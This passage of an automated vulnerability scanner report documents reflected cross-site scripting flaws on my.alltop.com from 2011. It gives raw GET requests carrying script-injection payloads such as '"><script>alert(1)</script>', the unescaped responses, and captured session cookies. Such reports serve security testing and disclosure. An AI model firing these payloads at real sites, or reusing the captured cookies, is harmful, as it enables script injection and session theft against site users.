Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3Ce7863"><script>alert(1)</script>40d22640f71/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.154. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4e2"><script>alert(1)</script>c550f6a6c78 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E2e4e2"><script>alert(1)</script>c550f6a6c78 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E2e4e2"><script>alert(1)</script>c550f6a6c78" method="post" accept-charset="utf-8">
...[SNIP]...

1.155. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ee1a"><script>alert(1)</script>fafa8b3c29d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E?5ee1a"><script>alert(1)</script>fafa8b3c29d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E?5ee1a"><script>alert(1)</script>fafa8b3c29d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.156. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%22ns=%22netsparker(0x0001D9)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1d5"><script>alert(1)</script>ea17928c2a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ifa1d5"><script>alert(1)</script>ea17928c2a6/%22ns=%22netsparker(0x0001D9) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ifa1d5"><script>alert(1)</script>ea17928c2a6/%22ns=%22netsparker(0x0001D9)" method="post" accept-charset="utf-8">
...[SNIP]...

1.157. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%22ns=%22netsparker(0x0001D9)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f23"><script>alert(1)</script>228c994bc6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%22nsa5f23"><script>alert(1)</script>228c994bc6e=%22netsparker(0x0001D9) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%22nsa5f23"><script>alert(1)</script>228c994bc6e=%22netsparker(0x0001D9)" method="post" accept-charset="utf-8">
...[SNIP]...

1.158. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%22ns=%22netsparker(0x0001D9)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b30"><script>alert(1)</script>48d2acbcfe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%22ns=%22netsparker(0x0001D9)?e5b30"><script>alert(1)</script>48d2acbcfe1=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%22ns=%22netsparker(0x0001D9)?e5b30"><script>alert(1)</script>48d2acbcfe1=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.159. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a0b"><script>alert(1)</script>e73716bb60f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ic4a0b"><script>alert(1)</script>e73716bb60f/%2522ns%253D%2522netsparker%25280x0001E2%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ic4a0b"><script>alert(1)</script>e73716bb60f/%2522ns%253D%2522netsparker%25280x0001E2%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.160. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ab8"><script>alert(1)</script>cd321978f42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)40ab8"><script>alert(1)</script>cd321978f42 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)40ab8"><script>alert(1)</script>cd321978f42" method="post" accept-charset="utf-8">
...[SNIP]...

1.161. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb98"><script>alert(1)</script>dcc1bc07c78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)?2bb98"><script>alert(1)</script>dcc1bc07c78=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:05 GMT; path=/; domain=.alltop.com
